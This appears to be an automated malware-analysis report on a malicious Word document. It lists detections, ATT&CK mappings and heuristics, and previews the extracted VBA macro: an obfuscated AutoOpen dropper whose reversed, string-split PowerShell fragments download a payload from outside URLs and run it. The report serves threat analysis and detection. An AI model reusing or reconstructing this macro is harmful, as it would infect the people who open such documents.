MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, a critical heuristic, indicating an attempt to execute arbitrary commands. The presence of the ClamAV detection 'Doc.Dropper.Agent-6543752-0' further confirms its malicious nature as a dropper. The macro's intent is to download and execute a second-stage payload, characteristic of a dropper malware.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6543493-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6543493-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 117706 bytes |
SHA-256: ce55d58c505545c3e536f0ed641f937ab0cfc19e55b19a83d7f609d487ca4f0a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "cmUhwBz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub FrFdqX(ZzUjD)
dDbUsO = SaIMPN + Sgn(90074 - rmjjQ - SEjLO + Fix(45471)) - 31249 - CDbl(71987)
TvEafP = Xspmj
jtOcdz = LoDmvL
rJirLj = 69435
End Sub
Sub RKnPzh(nqiUn)
pzmuQ = iisRf + Sgn(37904 - SOOwb - vucDpN + Fix(513)) - 714 - CDbl(94637)
NIaYd = Mrwud
KYtIw = PzZrCU
aNtwhQ = 6563
diIEvm = CWBjW + Sgn(81002 - DKjRRl - cVGGjD + Fix(77088)) - 36227 - CDbl(90297)
iZXhu = EAvwwC
VzBrKi = PwSkB
CzOjc = 68721
mCwSCJ = cQVmAZ + Sgn(60265 - JiLdki - fHnfki + Fix(12811)) - 72606 - CDbl(23018)
NaDTA = pBIozc
jbiRok = wzzmX
fWYrVi = 18849
End Sub
Sub nwbRI(WbbqAC)
EDFQSB = XNdQwL + Sgn(6713 - cQSUT - vdCAj + Fix(77343)) - 3734 - CDbl(43984)
GmUMb = SaDdW
ZULVzs = zLXfj
IaDQm = 25857
AqXdbw = AJpPrz + Sgn(42610 - Iriiv - XMiGkz + Fix(36373)) - 84591 - CDbl(29565)
RPksj = htwQDp
Iomrm = MlDRn
ioWqzJ = 15542
End Sub
Sub Autoopen()
On Error Resume Next
fzbMdm = Jlkfu + Sgn(65604 - aSwIjZ - YOwwP + Fix(10225)) - 18464 - CDbl(19873)
zHvup = NZNAI
ATmsu = OEsqci
GjdPOh = 1344
QpBsoXROUR (ikYznA + PTuKDuUFHvsZYw + FYufR)
YuMEU = vFKIi + Sgn(24601 - jbjJw - HCRiN + Fix(86744)) - 15068 - CDbl(73725)
zTvzRq = oRLuPF
XbumjR = VOwMJw
LwLMf = 92413
End Sub
Sub rMhvN(nSwDE)
IuHTG = UMdEz + Sgn(70152 - rbcSA - jJnjON + Fix(83271)) - 42316 - CDbl(33177)
DQsIHp = EfEnL
cmNwnV = KzwVU
VNsFPC = 5984
aoGcA = PYnvu + Sgn(46352 - KtBQD - spDRW + Fix(75660)) - 27634 - CDbl(38994)
LZplIX = wGUnT
mMDbw = LTrpL
KWXWj = 78599
iQMNFI = BHvuw + Sgn(32065 - iCqOvq - JiUkij + Fix(94658)) - 1064 - CDbl(60715)
WfBlta = zSjRDY
suUcUj = owrYl
dbZSBc = 39615
End Sub
Sub QPwoc(RdJdGG)
sjPUj = TihJMH + Sgn(65335 - WtOQb - YbfYo + Fix(83610)) - 77468 - CDbl(83015)
oOSiV = rKwUcB
jFjjuW = jvMfDw
EqjoL = 53623
End Sub
Attribute VB_Name = "svtdMkijPv"
Sub BirZoH(SwbtBn)
WUnTRf = ZSrKq + Sgn(7024 - lQAfRj - PYfCZ + Fix(84897)) - 86299 - CDbl(60770)
zuFBqQ = QwPjcP
OwDPj = aNkGZH
IQsnYu = 45095
End Sub
Function PTuKDuUFHvsZYw()
On Error Resume Next
QkBrVZ = hBAZzY + Sgn(31620 - VdLzU - KzbiTi + Fix(98887)) - 10874 - CDbl(52982)
isIwO = XLGqj
GAHYrM = KMuCG
lZIBq = 71092
rkoWa = SzHPEf + Sgn(49639 - suqQm - SNAwu + Fix(90416)) - 89782 - CDbl(95718)
UXoaE = iRhSzC
LXurAU = CmOqR
ijqcfl = 40322
jjsVi = YdLISj("sLp'.cf'+'sapXd(sJ'+'Oe'+'l'+'Tp8'+'IFda'+'OTp8lnWT'+'p8oDsJ'+'O.UYYpXd{yrt'+'{)XC'+'D'+'Ap'+'Xd ni cfsapXdhNRNNi", 24460 + 7 - 24460, 24460 + 104 - 24460)
mrQFVl = cJznJ + Sgn(38008 - dDCuZ - IiJzIN + Fix(2674)) - 99735 - CDbl(52607)
nOhMZ = imijEa
QDHWdF = ZkLkdE
SwIjJB = 7985
hhsoV = mvEnf + Sgn(23637 - wIAsu - wjbfT + Fix(73173)) - 36772 - CDbl(7683)
Zrpil = Zomjl
cioCGw = nGVhba
lGCYCC = 7733
PObsor = YdLISj("LuJ'+'924//:ptth@/'+'ANO'+'Pyj7/u'+'a.mo'+'c.re'+'zagnus/'+'/'+':ptth@'+'/y'+'Dzb23'+'ep/k'+'u.o'+'c'+'.in'+'imh'+'sittoc'+'s/'+'/:ptth'+' POu'+' ='+' XCD'+'A'+'p'+'Xd;)331'+'2fpr,v", 19813 + 6 - 19813, 19813 + 173 - 19813)
VNzAaz = TNJIT + Sgn(42385 - ncMpn - EEJOE + Fix(16584)) - 32450 - CDbl(38339)
NjjmAI = EGViOm
YTGGj = ZMNOn
REjvS = 62978
XXDfM = EFkKmp + Sgn(87076 - iSwJiF - tjdnaz + Fix(91361)) - 19636 - CDbl(15711)
jtSVi = Yjcznc
DLiXWb = nvFXd
ZrlnJv = 54604
HOwTYSKjF = YdLISj("s%pp15]rAHC[( eCALpER-)'}}{h'+'cta'+'c'+'};'+'k'+'aerb'+';'+')CD'+'SpXd'+'()POum'+'et'+'I-eP'+'Ou+'+'P'+'OukPOu+P'+'Ouo'+'vnIPO'+'u(&;)CDSpXd ,)'+'('+'sJO'+'gN'+'Tp8'+'iTp8'+'rtSo'+'Ts'+'J'+'O'+3zNc", 9409 + 5 - 9409, 9409 + 191 - 9409)
CvbXw = YZBGEQ + Sgn(5271 - cwcZis - nourr + Fix(23209)) - 62674 - CDbl(95520)
pszTAQ = zZvqN
zTNnwP = KkMjwP
jjFUr = 53843
pONzVG = aPpRPS + Sgn(38125 - SzYbv - hwXWFM + Fix(57372)) - 66793 - CDbl(17346)
lUDRL = kpZRl
NGuMsf = NjsmFH
pbPtF = 84423
oMRiVALHnPb = YdLISj("BtJX)''nioJ-]52,62,4[cepsMoC:vNE$ (& |)69]rAHC[,)48]rAHC[+211]rAHC[+65w1JB", 24360 + 5 - 243
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.